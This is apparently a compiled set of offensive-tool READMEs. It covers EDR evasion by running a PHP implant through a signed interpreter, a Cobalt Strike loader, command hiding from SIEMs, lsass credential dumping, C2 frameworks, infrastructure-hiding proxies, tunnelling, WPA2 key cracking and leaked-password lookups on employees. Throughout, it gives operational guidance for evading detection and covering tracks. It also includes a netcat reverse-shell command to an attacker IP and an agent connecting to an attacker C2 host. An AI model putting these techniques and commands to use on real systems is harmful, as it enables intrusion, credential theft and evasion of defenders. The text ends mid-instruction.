Evade EDR's the simple way, by not touching any of the API's they hook.
I've noticed that most EDRs fail to scan scripting files, treating them merely as text files. While this might be unfortunate for them, it's an opportunity for us to profit.
Flashy methods like residing in memory or thread injection are heavily monitored. Without a binary signed by a valid Certificate Authority, execution is nearly impossible.
Enter BYOSI (Bring Your Own Scripting Interpreter). Every scripting interpreter is signed by its creator, with each certificate being valid. Testing in a live environment revealed surprising results: a highly signatured PHP script from this repository not only ran on systems monitored by CrowdStrike and Trellix but also established an external connection without triggering any EDR detections. EDRs typically overlook script files, focusing instead on binaries for implant delivery. They're configured to detect high entropy or suspicious sections in binaries, not simple scripts.
This attack method capitalizes on that oversight for significant profit. The PowerShell script's steps mirror what a developer might do when first entering an environment. Remarkably, just four lines of PowerShell code completely evade EDR detection, with Defender/AMSI also blind to it. Adding to the effectiveness, GitHub serves as a trusted deployer.
The PowerShell script achieves EDR/AV evasion through four simple steps (technically 3):
1.) It fetches the PHP archive for Windows and extracts it into a new directory named 'php' within 'C:\Temp'.
2.) The script then proceeds to acquire the implant PHP script or shell, saving it in the same 'C:\Temp\php' directory.
3.) Following this, it executes the implant or shell, utilizing the whitelisted PHP binary (which exempts the binary from most restrictions in place that would prevent the binary from running to begin with.)
With these actions completed, congratulations: you now have an active shell on a Crowdstrike-monitored system. What's particularly amusing is that, if my memory serves me correctly, Sentinel One is unable to scan PHP file types. So, feel free to let your imagination run wild.
I am in no way responsible for the misuse of this. This issue is a major blind spot in EDR protection, i am only bringing it to everyones attention.
A big thanks to @im4x5yn74x for affectionately giving it the name BYOSI, and helping with the env to test in bringing this attack method to life.
It appears as though MS Defender is now flagging the PHP script as malicious, but still fully allowing the Powershell script full execution. so, modify the PHP script.
hello sentinel one :) might want to make sure that you are making links not embed.
A tool to find a company (target) infrastructure, files, and apps on the top cloud providers (Amazon, Google, Microsoft, DigitalOcean, Alibaba, Vultr, Linode). The outcome is useful for bug bounty hunters, red teamers, and penetration testers alike.
The complete writeup is available. here
we are always thinking of something we can automate to make black-box security testing easier. We discussed this idea of creating a multiple platform cloud brute-force hunter.mainly to find open buckets, apps, and databases hosted on the clouds and possibly app behind proxy servers.
Here is the list issues on previous approaches we tried to fix:
Microsoft: - Storage - Apps
Amazon: - Storage - Apps
Google: - Storage - Apps
DigitalOcean: - storage
Vultr: - Storage
Linode: - Storage
Alibaba: - Storage
1.0.0
Just download the latest release for your operation system and follow the usage.
To make the best use of this tool, you have to understand how to configure it correctly. When you open your downloaded version, there is a config folder, and there is a config.YAML file in there.
It looks like this
providers: ["amazon","alibaba","amazon","microsoft","digitalocean","linode","vultr","google"] # supported providers
environments: [ "test", "dev", "prod", "stage" , "staging" , "bak" ] # used for mutations
proxytype: "http" # socks5 / http
ipinfo: "" # IPINFO.io API KEY
For IPINFO API, you can register and get a free key at IPINFO, the environments used to generate URLs, such as test-keyword.target.region and test.keyword.target.region, etc.
We provided some wordlist out of the box, but it's better to customize and minimize your wordlists (based on your recon) before executing the tool.
After setting up your API key, you are ready to use CloudBrute.
โโโโโโโโโโ โโโโโโโ โโโ โโโโโโโโโโ โโโโโโโ โโโโโโโ โโโ โโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโ โโโโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโ
โโโ โโโ โโโ โโโโโโ โโโโโโ โโโโโโโโโโโโโโโโโโโโโโ โโโ โโโ โโโโโโ
โโโ โโโ โโโ โโโโโโ โโโโโโ โโโโโโโโโโโโโโโโโโโโโโ โโโ โโโ โโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโโ โโโ โโโโโโโโ
โโโโโโโโโโโโโโโ โโโโโโโ โโโโโโโ โโโโโโโ โโโโโโโ โโโ โโโ โโโโโโโ โโโ โโโโโโโโ
V 1.0.7
usage: CloudBrute [-h|--help] -d|--domain "<value>" -k|--keyword "<value>"
-w|--wordlist "<value>" [-c|--cloud "<value>"] [-t|--threads
<integer>] [-T|--timeout <integer>] [-p|--proxy "<value>"]
[-a|--randomagent "<value>"] [-D|--debug] [-q|--quite]
[-m|--mode "<value>"] [-o|--output "<value>"]
[-C|--configFolder "<value>"]
Awesome Cloud Enumerator
Arguments:
-h --help Print help information
-d --domain domain
-k --keyword keyword used to generator urls
-w --wordlist path to wordlist
-c --cloud force a search, check config.yaml providers list
-t --threads number of threads. Default: 80
-T --timeout timeout per request in seconds. Default: 10
-p --proxy use proxy list
-a --randomagent user agent randomization
-D --debug show debug logs. Default: false
-q --quite suppress all output. Default: false
-m --mode storage or app. Default: storage
-o --output Output file. Default: out.txt
-C --configFolder Config path. Default: config
for example
CloudBrute -d target.com -k target -m storage -t 80 -T 10 -w "./data/storage_small.txt"
please note -k keyword used to generate URLs, so if you want the full domain to be part of mutation, you have used it for both domain (-d) and keyword (-k) arguments
If a cloud provider not detected or want force searching on a specific provider, you can use -c option.
CloudBrute -d target.com -k keyword -m storage -t 80 -T 10 -w -c amazon -o target_output.txt
Read the usage.
Make sure you read the usage correctly, and if you think you found a bug open an issue.
It's because you use public proxies, use private and higher quality proxies. You can use ProxyFor to verify the good proxies with your chosen provider.
change -T (timeout) option to get best results for your run.
Inspired by every single repo listed here .
A proof-of-concept User-Defined Reflective Loader (UDRL) which aims to recreate, integrate, and enhance Cobalt Strike's evasion features!
Contributor | Notable Contributions | |
---|---|---|
Bobby Cooke | @0xBoku | Project original author and maintainer |
Santiago Pecin | @s4ntiago_p | Reflective Loader major enhancements |
Chris Spehn | @ConsciousHacker | Aggressor scripting |
Joshua Magri | @passthehashbrwn | IAT hooking |
Dylan Tran | @d_tranman | Reflective Call Stack Spoofing |
James Yeung | @5cript1diot | Indirect System Calls |
The built-in Cobalt Strike reflective loader is robust, handling all Malleable PE evasion features Cobalt Strike has to offer. The major disadvantage to using a custom UDRL is Malleable PE evasion features may or may not be supported out-of-the-box.
The objective of the public BokuLoader project is to assist red teams in creating their own in-house Cobalt Strike UDRL. The project aims to support all worthwhile CS Malleable PE evasion features. Some evasion features leverage CS integration, others have been recreated completely, and some are unsupported.
Before using this project, in any form, you should properly test the evasion features are working as intended. Between the C code and the Aggressor script, compilation with different versions of operating systems, compilers, and Java may return different results.
NtProtectVirtualMemory
obfuscate "true"
with custom UDRL Aggressor script implementation.0x1000
bytes will be nulls.XGetProcAddress
for resolving symbolsKernel32.GetProcAddress
xLoadLibrary
for resolving DLL's base address & DLL LoadingTEB->PEB->PEB_LDR_DATA->InMemoryOrderModuleList
Kernel32.LoadLibraryA
Command | Option(s) | Supported |
---|---|---|
allocator | HeapAlloc, MapViewOfFile, VirtualAlloc | All supported via BokuLoader implementation |
module_x64 | string (DLL Name) | Supported via BokuLoader implementation. Same DLL stomping requirements as CS implementation apply |
obfuscate | true/false | HTTP/S beacons supported via BokuLoader implementation. SMB/TCP is currently not supported for obfuscate true. Details in issue. Accepting help if you can fix :) |
entry_point | RVA as decimal number | Supported via BokuLoader implementation |
cleanup | true | Supported via CS integration |
userwx | true/false | Supported via BokuLoader implementation |
sleep_mask | (true/false) or (Sleepmask Kit+true) | Supported. When using default "sleepmask true" (without sleepmask kit) set "userwx true". When using sleepmask kit which supports RX beacon.text memory (src47/Ekko ) set "sleepmask true" && "userwx false". |
magic_mz_x64 | 4 char string | Supported via CS integration |
magic_pe | 2 char string | Supported via CS integration |
transform-x64 prepend | escaped hex string |
BokuLoader.cna Aggressor script modification |
transform-x64 strrep | string string |
BokuLoader.cna Aggressor script modification |
stomppe | true/false | Unsupported. BokuLoader does not copy beacon DLL headers over. First 0x1000 bytes of virtual beacon DLL are 0x00
|
checksum | number | Experimental. BokuLoader.cna Aggressor script modification |
compile_time | date-time string | Experimental. BokuLoader.cna Aggressor script modification |
image_size_x64 | decimal value | Unsupported |
name | string | Experimental. BokuLoader.cna Aggressor script modification |
rich_header | escaped hex string | Experimental. BokuLoader.cna Aggressor script modification |
stringw | string | Unsupported |
string | string | Unsupported |
make
BokuLoader.cna
Aggressor scriptUse the Script Console
to ensure BokuLoader was implemented in the beacon build
Does not support x86 option. The x86 bin is the original Reflective Loader object file.
RAW
beacons works out of the box. When using the Artifact Kit for the beacon loader, the stagesize
variable must be larger than the default.Original Cobalt Strike String | BokuLoader Cobalt Strike String |
---|---|
ReflectiveLoader | BokuLoader |
Microsoft Base Cryptographic Provider v1.0 | 12367321236742382543232341241261363163151d |
(admin) | (tomin) |
beacon | bacons |
Kernel32.LoadLibraryExA
is called to map the DLL from diskKernel32.LoadLibraryExA
is DONT_RESOLVE_DLL_REFERENCES (0x00000001)
RX
or RWX
memory will exist in the heap if sleepmask kit is not used.Kernel32.CreateFileMappingA
& Kernel32.MapViewOfFile
is called to allocate memory for the virtual beacon DLL.NtAllocateVirtualMemory
, NtProtectVirtualMemory
ntdll.dll
will not detect these systemcalls.mov eax, r11d; mov r11, r10; mov r10, rcx; jmp r11
assembly instructions within its executable memory.0x1000
bytes of the virtual beacon DLL are zeros.
During pentest, an important aspect is to be stealth. For this reason you should clear your tracks after your passage. Nevertheless, many infrastructures log command and send them to a SIEM in a real time making the afterwards cleaning part alone useless.volana
provide a simple way to hide commands executed on compromised machine by providing it self shell runtime (enter your command, volana executes for you). Like this you clear your tracks DURING your passage
You need to get an interactive shell. (Find a way to spawn it, you are a hacker, it's your job ! otherwise). Then download it on target machine and launch it. that's it, now you can type the command you want to be stealthy executed
## Download it from github release
## If you do not have internet access from compromised machine, find another way
curl -lO -L https://github.com/ariary/volana/releases/latest/download/volana
## Execute it
./volana
## You are now under the radar
volana ยป echo "Hi SIEM team! Do you find me?" > /dev/null 2>&1 #you are allowed to be a bit cocky
volana ยป [command]
Keyword for volana console: * ring
: enable ring mode ie each command is launched with plenty others to cover tracks (from solution that monitor system call) * exit
: exit volana console
Imagine you have a non interactive shell (webshell or blind rce), you could use encrypt
and decrypt
subcommand. Previously, you need to build volana
with embedded encryption key.
On attacker machine
## Build volana with encryption key
make build.volana-with-encryption
## Transfer it on TARGET (the unique detectable command)
## [...]
## Encrypt the command you want to stealthy execute
## (Here a nc bindshell to obtain a interactive shell)
volana encr "nc [attacker_ip] [attacker_port] -e /bin/bash"
>>> ENCRYPTED COMMAND
Copy encrypted command and executed it with your rce on target machine
./volana decr [encrypted_command]
## Now you have a bindshell, spawn it to make it interactive and use volana usually to be stealth (./volana). + Don't forget to remove volana binary before leaving (cause decryption key can easily be retrieved from it)
Why not just hide command with echo [command] | base64
? And decode on target with echo [encoded_command] | base64 -d | bash
Because we want to be protected against systems that trigger alert for base64
use or that seek base64 text in command. Also we want to make investigation difficult and base64 isn't a real brake.
Keep in mind that volana
is not a miracle that will make you totally invisible. Its aim is to make intrusion detection and investigation harder.
By detected we mean if we are able to trigger an alert if a certain command has been executed.
Only the volana
launching command line will be catched. ๐ง However, by adding a space before executing it, the default bash behavior is to not save it
.bash_history
, ".zsh_history" etc ..opensnoop
)script
, screen -L
, sexonthebash
, ovh-ttyrec
, etc..)pkill -9 script
screen
is a bit more difficult to avoid, however it does not register input (secret input: stty -echo
=> avoid)volana
with encryption /var/log/auth.log
)sudo
or su
commandslogger -p auth.info "No hacker is poisoning your syslog solution, don't worry"
)LD_PRELOAD
injection to make logSorry for the clickbait title, but no money will be provided for contibutors. ๐
Let me know if you have found: * a way to detect volana
* a way to spy console that don't detect volana
commands * a way to avoid a detection system
NativeDump allows to dump the lsass process using only NTAPIs generating a Minidump file with only the streams needed to be parsed by tools like Mimikatz or Pypykatz (SystemInfo, ModuleList and Memory64List Streams).
Usage:
NativeDump.exe [DUMP_FILE]
The default file name is "proc_
The tool has been tested against Windows 10 and 11 devices with the most common security solutions (Microsoft Defender for Endpoints, Crowdstrike...) and is for now undetected. However, it does not work if PPL is enabled in the system.
Some benefits of this technique are: - It does not use the well-known dbghelp!MinidumpWriteDump function - It only uses functions from Ntdll.dll, so it is possible to bypass API hooking by remapping the library - The Minidump file does not have to be written to disk, you can transfer its bytes (encoded or encrypted) to a remote machine
The project has three branches at the moment (apart from the main branch with the basic technique):
ntdlloverwrite - Overwrite ntdll.dll's ".text" section using a clean version from the DLL file already on disk
delegates - Overwrite ntdll.dll + Dynamic function resolution + String encryption with AES + XOR-encoding
remote - Overwrite ntdll.dll + Dynamic function resolution + String encryption with AES + Send file to remote machine + XOR-encoding
After reading Minidump undocumented structures, its structure can be summed up to:
I created a parsing tool which can be helpful: MinidumpParser.
We will focus on creating a valid file with only the necessary values for the header, stream directory and the only 3 streams needed for a Minidump file to be parsed by Mimikatz/Pypykatz: SystemInfo, ModuleList and Memory64List Streams.
The header is a 32-bytes structure which can be defined in C# as:
public struct MinidumpHeader
{
public uint Signature;
public ushort Version;
public ushort ImplementationVersion;
public ushort NumberOfStreams;
public uint StreamDirectoryRva;
public uint CheckSum;
public IntPtr TimeDateStamp;
}
The required values are: - Signature: Fixed value 0x504d44d ("MDMP" string) - Version: Fixed value 0xa793 (Microsoft constant MINIDUMP_VERSION) - NumberOfStreams: Fixed value 3, the three Streams required for the file - StreamDirectoryRVA: Fixed value 0x20 or 32 bytes, the size of the header
Each entry in the Stream Directory is a 12-bytes structure so having 3 entries the size is 36 bytes. The C# struct definition for an entry is:
public struct MinidumpStreamDirectoryEntry
{
public uint StreamType;
public uint Size;
public uint Location;
}
The field "StreamType" represents the type of stream as an integer or ID, some of the most relevant are:
ID | Stream Type |
---|---|
0x00 | UnusedStream |
0x01 | ReservedStream0 |
0x02 | ReservedStream1 |
0x03 | ThreadListStream |
0x04 | ModuleListStream |
0x05 | MemoryListStream |
0x06 | ExceptionStream |
0x07 | SystemInfoStream |
0x08 | ThreadExListStream |
0x09 | Memory64ListStream |
0x0A | CommentStreamA |
0x0B | CommentStreamW |
0x0C | HandleDataStream |
0x0D | FunctionTableStream |
0x0E | UnloadedModuleListStream |
0x0F | MiscInfoStream |
0x10 | MemoryInfoListStream |
0x11 | ThreadInfoListStream |
0x12 | HandleOperationListStream |
0x13 | TokenStream |
0x16 | HandleOperationListStream |
First stream is a SystemInformation Stream, with ID 7. The size is 56 bytes and will be located at offset 68 (0x44), after the Stream Directory. Its C# definition is:
public struct SystemInformationStream
{
public ushort ProcessorArchitecture;
public ushort ProcessorLevel;
public ushort ProcessorRevision;
public byte NumberOfProcessors;
public byte ProductType;
public uint MajorVersion;
public uint MinorVersion;
public uint BuildNumber;
public uint PlatformId;
public uint UnknownField1;
public uint UnknownField2;
public IntPtr ProcessorFeatures;
public IntPtr ProcessorFeatures2;
public uint UnknownField3;
public ushort UnknownField14;
public byte UnknownField15;
}
The required values are: - ProcessorArchitecture: 9 for 64-bit and 0 for 32-bit Windows systems - Major version, Minor version and the BuildNumber: Hardcoded or obtained through kernel32!GetVersionEx or ntdll!RtlGetVersion (we will use the latter)
Second stream is a ModuleList stream, with ID 4. It is located at offset 124 (0x7C) after the SystemInformation stream and it will also have a fixed size, of 112 bytes, since it will have the entry of a single module, the only one needed for the parse to be correct: "lsasrv.dll".
The typical structure for this stream is a 4-byte value containing the number of entries followed by 108-byte entries for each module:
public struct ModuleListStream
{
public uint NumberOfModules;
public ModuleInfo[] Modules;
}
As there is only one, it gets simplified to:
public struct ModuleListStream
{
public uint NumberOfModules;
public IntPtr BaseAddress;
public uint Size;
public uint UnknownField1;
public uint Timestamp;
public uint PointerName;
public IntPtr UnknownField2;
public IntPtr UnknownField3;
public IntPtr UnknownField4;
public IntPtr UnknownField5;
public IntPtr UnknownField6;
public IntPtr UnknownField7;
public IntPtr UnknownField8;
public IntPtr UnknownField9;
public IntPtr UnknownField10;
public IntPtr UnknownField11;
}
The required values are: - NumberOfStreams: Fixed value 1 - BaseAddress: Using psapi!GetModuleBaseName or a combination of ntdll!NtQueryInformationProcess and ntdll!NtReadVirtualMemory (we will use the latter) - Size: Obtained adding all memory region sizes since BaseAddress until one with a size of 4096 bytes (0x1000), the .text section of other library - PointerToName: Unicode string structure for the "C:\Windows\System32\lsasrv.dll" string, located after the stream itself at offset 236 (0xEC)
Third stream is a Memory64List stream, with ID 9. It is located at offset 298 (0x12A), after the ModuleList stream and the Unicode string, and its size depends on the number of modules.
public struct Memory64ListStream
{
public ulong NumberOfEntries;
public uint MemoryRegionsBaseAddress;
public Memory64Info[] MemoryInfoEntries;
}
Each module entry is a 16-bytes structure:
public struct Memory64Info
{
public IntPtr Address;
public IntPtr Size;
}
The required values are: - NumberOfEntries: Number of memory regions, obtained after looping memory regions - MemoryRegionsBaseAddress: Location of the start of memory regions bytes, calculated after adding the size of all 16-bytes memory entries - Address and Size: Obtained for each valid region while looping them
There are pre-requisites to loop the memory regions of the lsass.exe process which can be solved using only NTAPIs:
With this it is possible to traverse process memory by calling: - ntdll!NtQueryVirtualMemory: Return a MEMORY_BASIC_INFORMATION structure with the protection type, state, base address and size of each memory region - If the memory protection is not PAGE_NOACCESS (0x01) and the memory state is MEM_COMMIT (0x1000), meaning it is accessible and committed, the base address and size populates one entry of the Memory64List stream and bytes can be added to the file - If the base address equals lsasrv.dll base address, it is used to calculate the size of lsasrv.dll in memory - ntdll!NtReadVirtualMemory: Add bytes of that region to the Minidump file after the Memory64List Stream
After previous steps we have all that is necessary to create the Minidump file. We can create a file locally or send the bytes to a remote machine, with the possibility of encoding or encrypting the bytes before. Some of these possibilities are coded in the delegates branch, where the file created locally can be encoded with XOR, and in the remote branch, where the file can be encoded with XOR before being sent to a remote machine.
BadExclusionsNWBO is an evolution from BadExclusions to identify folder custom or undocumented exclusions on AV/EDR.
BadExclusionsNWBO copies and runs Hook_Checker.exe in all folders and subfolders of a given path. You need to have Hook_Checker.exe on the same folder of BadExclusionsNWBO.exe.
Hook_Checker.exe returns the number of EDR hooks. If the number of hooks is 7 or less means folder has an exclusion otherwise the folder is not excluded.
Since the release of BadExclusions I've been thinking on how to achieve the same results without creating that many noise. The solution came from another tool, https://github.com/asaurusrex/Probatorum-EDR-Userland-Hook-Checker.
If you download Probatorum-EDR-Userland-Hook-Checker and you run it inside a regular folder and on folder with an specific type of exclusion you will notice a huge difference. All the information is on the Probatorum repository.
Each vendor apply exclusions on a different way. In order to get the list of folder exclusions an specific type of exclusion should be made. Not all types of exclusion and not all the vendors remove the hooks when they exclude a folder.
The user who runs BadExclusionsNWBO needs write permissions on the excluded folder in order to write Hook_Checker file and get the results.
https://github.com/iamagarre/BadExclusionsNWBO/assets/89855208/46982975-f4a5-4894-b78d-8d6ed9b1c8c4
The C2 Cloud is a robust web-based C2 framework, designed to simplify the life of penetration testers. It allows easy access to compromised backdoors, just like accessing an EC2 instance in the AWS cloud. It can manage several simultaneous backdoor sessions with a user-friendly interface.
C2 Cloud is open source. Security analysts can confidently perform simulations, gaining valuable experience and contributing to the proactive defense posture of their organizations.
Reverse shells support:
C2 Cloud walkthrough: https://youtu.be/hrHT_RDcGj8
Ransomware simulation using C2 Cloud: https://youtu.be/LKaCDmLAyvM
Telegram C2: https://youtu.be/WLQtF4hbCKk
๐ Anywhere Access: Reach the C2 Cloud from any location.
๐ Multiple Backdoor Sessions: Manage and support multiple sessions effortlessly.
๐ฑ๏ธ One-Click Backdoor Access: Seamlessly navigate to backdoors with a simple click.
๐ Session History Maintenance: Track and retain complete command and response history for comprehensive analysis.
๐ ๏ธ Flask: Serving web and API traffic, facilitating reverse HTTP(s) requests.
๐ TCP Socket: Serving reverse TCP requests for enhanced functionality.
๐ Nginx: Effortlessly routing traffic between web and backend systems.
๐จ Redis PubSub: Serving as a robust message broker for seamless communication.
๐ Websockets: Delivering real-time updates to browser clients for enhanced user experience.
๐พ Postgres DB: Ensuring persistent storage for seamless continuity.
Reverse TCP port: 8888
Clone the repo
Inspired by Villain, a CLI-based C2 developed by Panagiotis Chartas.
Distributed under the MIT License. See LICENSE for more information.
BounceBack is a powerful, highly customizable and configurable reverse proxy with WAF functionality for hiding your C2/phishing/etc infrastructure from blue teams, sandboxes, scanners, etc. It uses real-time traffic analysis through various filters and their combinations to hide your tools from illegitimate visitors.
The tool is distributed with preconfigured lists of blocked words, blocked and allowed IP addresses.
For more information on tool usage, you may visit project's wiki.
BounceBack currently supports the following filters:
Custom rules may be easily added, just register your RuleBaseCreator or RuleWrapperCreator. See already created RuleBaseCreators and RuleWrapperCreators
Rules configuration page may be found here.
At the moment, BounceBack supports the following protocols:
Custom protocols may be easily added, just register your new type in manager. Example proxy realizations may be found here.
Proxies configuration page may be found here.
Just download latest release from release page, unzip it, edit config file and go on.
If you want to build it from source, install goreleaser and run:
goreleaser release --clean --snapshot
Ligolo-ng is a simple, lightweight and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection using a tun interface (without the need of SOCKS).
Instead of using a SOCKS proxy or TCP/UDP forwarders, Ligolo-ng creates a userland network stack using Gvisor.
When running the relay/proxy server, a tun interface is used, packets sent to this interface are translated, and then transmitted to the agent remote network.
As an example, for a TCP connection:
This allows running tools like nmap without the use of proxychains (simpler and faster).
Precompiled binaries (Windows/Linux/macOS) are available on the Release page.
Building ligolo-ng (Go >= 1.20 is required):
$ go build -o agent cmd/agent/main.go
$ go build -o proxy cmd/proxy/main.go
# Build for Windows
$ GOOS=windows go build -o agent.exe cmd/agent/main.go
$ GOOS=windows go build -o proxy.exe cmd/proxy/main.go
When using Linux, you need to create a tun interface on the Proxy Server (C2):
$ sudo ip tuntap add user [your_username] mode tun ligolo
$ sudo ip link set ligolo up
You need to download the Wintun driver (used by WireGuard) and place the wintun.dll
in the same folder as Ligolo (make sure you use the right architecture).
Start the proxy server on your Command and Control (C2) server (default port 11601):
$ ./proxy -h # Help options
$ ./proxy -autocert # Automatically request LetsEncrypt certificates
When using the -autocert
option, the proxy will automatically request a certificate (using Let's Encrypt) for attacker_c2_server.com when an agent connects.
Port 80 needs to be accessible for Let's Encrypt certificate validation/retrieval
If you want to use your own certificates for the proxy server, you can use the -certfile
and -keyfile
parameters.
The proxy/relay can automatically generate self-signed TLS certificates using the -selfcert
option.
The -ignore-cert
option needs to be used with the agent.
Beware of man-in-the-middle attacks! This option should only be used in a test environment or for debugging purposes.
Start the agent on your target (victim) computer (no privileges are required!):
$ ./agent -connect attacker_c2_server.com:11601
If you want to tunnel the connection over a SOCKS5 proxy, you can use the
--socks ip:port
option. You can specify SOCKS credentials using the--socks-user
and--socks-pass
arguments.
A session should appear on the proxy server.
INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000"
Use the session
command to select the agent.
ligolo-ng ยป session
? Specify a session : 1 - nchatelain@nworkstation - XX.XX.XX.XX:38000
Display the network configuration of the agent using the ifconfig
command:
[Agent : nchatelain@nworkstation] ยป ifconfig
[...]
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ Interface 3 โ
โโโโโโโโโโโโโโโโฌโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโค
โ Name โ wlp3s0 โ
โ Hardware MAC โ de:ad:be:ef:ca:fe โ
โ MTU โ 1500 โ
โ Flags โ up|broadcast|multicast โ
โ IPv4 Address โ 192.168.0.30/24 โ
โโโโโโโโโโโโโโโโดโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
Add a route on the proxy/relay server to the 192.168.0.0/24 agent network.
Linux:
$ sudo ip route add 192.168.0.0/24 dev ligolo
Windows:
> netsh int ipv4 show interfaces
Idx Mรฉt MTU รtat Nom
--- ---------- ---------- ------------ ---------------------------
25 5 65535 connected ligolo
> route add 192.168.0.0 mask 255.255.255.0 0.0.0.0 if [THE INTERFACE IDX]
Start the tunnel on the proxy:
[Agent : nchatelain@nworkstation] ยป start
[Agent : nchatelain@nworkstation] ยป INFO[0690] Starting tunnel to nchatelain@nworkstation
You can now access the 192.168.0.0/24 agent network from the proxy server.
$ nmap 192.168.0.0/24 -v -sV -n
[...]
$ rdesktop 192.168.0.123
[...]
You can listen to ports on the agent and redirect connections to your control/proxy server.
In a ligolo session, use the listener_add
command.
The following example will create a TCP listening socket on the agent (0.0.0.0:1234) and redirect connections to the 4321 port of the proxy server.
[Agent : nchatelain@nworkstation] ยป listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4321 --tcp
INFO[1208] Listener created on remote agent!
On the proxy
:
$ nc -lvp 4321
When a connection is made on the TCP port 1234
of the agent, nc
will receive the connection.
This is very useful when using reverse tcp/udp payloads.
You can view currently running listeners using the listener_list
command and stop them using the listener_stop [ID]
command:
[Agent : nchatelain@nworkstation] ยป listener_list
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ Active listeners โ
โโโโโฌโโโโโโโโโโโโโโโโโโโโโโโโโโฌโโโโโ โโโโโโโโโโโโโโโโโโโโฌโโโโโโโโโโโโโโโโโโโโโโโโโค
โ # โ AGENT โ AGENT LISTENER ADDRESS โ PROXY REDIRECT ADDRESS โ
โโโโโผโโโโโโโโโโโโโโโโโโโโโโโโโโผโโโโโโโโโโโโโโโโโโโโโโโโโผโโโโโโโโโโโโโโโโโโโโโโโโ& #9508;
โ 0 โ nchatelain@nworkstation โ 0.0.0.0:1234 โ 127.0.0.1:4321 โ
โโโโโดโโโโโโโโโโโโโโโโโโโโโโโโโโดโโโโโโโโโโโโโโโโโโโโโโโโโดโโโโโโโโโโโโโโโโโโโโโโโโโ
[Agent : nchatelain@nworkstation] ยป listener_stop 0
INFO[1505] Listener closed.
On the agent side, no! Everything can be performed without administrative access.
However, on your relay/proxy server, you need to be able to create a tun interface.
You can easily hit more than 100 Mbits/sec. Here is a test using iperf
from a 200Mbits/s server to a 200Mbits/s connection.
$ iperf3 -c 10.10.0.1 -p 24483
Connecting to host 10.10.0.1, port 24483
[ 5] local 10.10.0.224 port 50654 connected to 10.10.0.1 port 24483
[ ID] Interval Transfer Bitrate Retr Cwnd
[ 5] 0.00-1.00 sec 12.5 MBytes 105 Mbits/sec 0 164 KBytes
[ 5] 1.00-2.00 sec 12.7 MBytes 107 Mbits/sec 0 263 KBytes
[ 5] 2.00-3.00 sec 12.4 MBytes 104 Mbits/sec 0 263 KBytes
[ 5] 3.00-4.00 sec 12.7 MBytes 106 Mbits/sec 0 263 KBytes
[ 5] 4.00-5.00 sec 13.1 MBytes 110 Mbits/sec 2 134 KBytes
[ 5] 5.00-6.00 sec 13.4 MBytes 113 Mbits/sec 0 147 KBytes
[ 5] 6.00-7.00 sec 12.6 MBytes 105 Mbits/sec 0 158 KBytes
[ 5] 7.00-8.00 sec 12.1 MBytes 101 Mbits/sec 0 173 KBytes
[ 5] 8. 00-9.00 sec 12.7 MBytes 106 Mbits/sec 0 182 KBytes
[ 5] 9.00-10.00 sec 12.6 MBytes 106 Mbits/sec 0 188 KBytes
- - - - - - - - - - - - - - - - - - - - - - - - -
[ ID] Interval Transfer Bitrate Retr
[ 5] 0.00-10.00 sec 127 MBytes 106 Mbits/sec 2 sender
[ 5] 0.00-10.08 sec 125 MBytes 104 Mbits/sec receiver
Because the agent is running without privileges, it's not possible to forward raw packets. When you perform a NMAP SYN-SCAN, a TCP connect() is performed on the agent.
When using nmap, you should use --unprivileged
or -PE
to avoid false positives.
This program is a tool written in Python to recover the pre-shared key of a WPA2 WiFi network without any de-authentication or requiring any clients to be on the network. It targets the weakness of certain access points advertising the PMKID value in EAPOL message 1.
python pmkidcracker.py -s <SSID> -ap <APMAC> -c <CLIENTMAC> -p <PMKID> -w <WORDLIST> -t <THREADS(Optional)>
NOTE: apmac, clientmac, pmkid must be a hexstring, e.g b8621f50edd9
The two main formulas to obtain a PMKID are as follows:
This is just for understanding, both are already implemented in find_pw_chunk
and calculate_pmkid
.
Below are the steps to obtain the PMKID manually by inspecting the packets in WireShark.
*You may use Hcxtools or Bettercap to quickly obtain the PMKID without the below steps. The manual way is for understanding.
To obtain the PMKID manually from wireshark, put your wireless antenna in monitor mode, start capturing all packets with airodump-ng or similar tools. Then connect to the AP using an invalid password to capture the EAPOL 1 handshake message. Follow the next 3 steps to obtain the fields needed for the arguments.
Open the pcap in WireShark:
wlan_rsna_eapol.keydes.msgnr == 1
in WireShark to display only EAPOL message 1 packets.If access point is vulnerable, you should see the PMKID value like the below screenshot:
This tool is for educational and testing purposes only. Do not use it to exploit the vulnerability on any network that you do not own or have permission to test. The authors of this script are not responsible for any misuse or damage caused by its use.
ย
This is a tool designed for Open Source Intelligence (OSINT) purposes, which helps to gather information about employees of a company.
The tool starts by searching through LinkedIn to obtain a list of employees of the company. Then, it looks for their social network profiles to find their personal email addresses. Finally, it uses those email addresses to search through a custom COMB database to retrieve leaked passwords. You an easily add yours and connect to through the tool.
To use this tool, you'll need to have Python 3.10 installed on your machine. Clone this repository to your local machine and install the required dependencies using pip in the cli folder:
cd cli
pip install -r requirements.txt
We know that there is a problem when installing the tool due to the psycopg2 binary. If you run into this problem, you can solve it running:
cd cli
python3 -m pip install psycopg2-binary`
To use the tool, simply run the following command:
python3 cli/emploleaks.py
If everything went well during the installation, you will be able to start using EmploLeaks:
___________ .__ .__ __
\_ _____/ _____ ______ | | ____ | | ____ _____ | | __ ______
| __)_ / \____ \| | / _ \| | _/ __ \__ \ | |/ / / ___/
| \ Y Y \ |_> > |_( <_> ) |_\ ___/ / __ \| < \___ \
/_______ /__|_| / __/|____/\____/|____/\___ >____ /__|_ \/____ >
\/ \/|__| \/ \/ \/ \/
OSINT tool รฐลธโขยต to chain multiple apis
emploleaks>
Right now, the tool supports two functionalities:
First, you must set the plugin to use, which in this case is linkedin. After, you should set your authentication tokens and the run the impersonate process:
emploleaks> use --plugin linkedin
emploleaks(linkedin)> setopt JSESSIONID
JSESSIONID:
[+] Updating value successfull
emploleaks(linkedin)> setopt li-at
li-at:
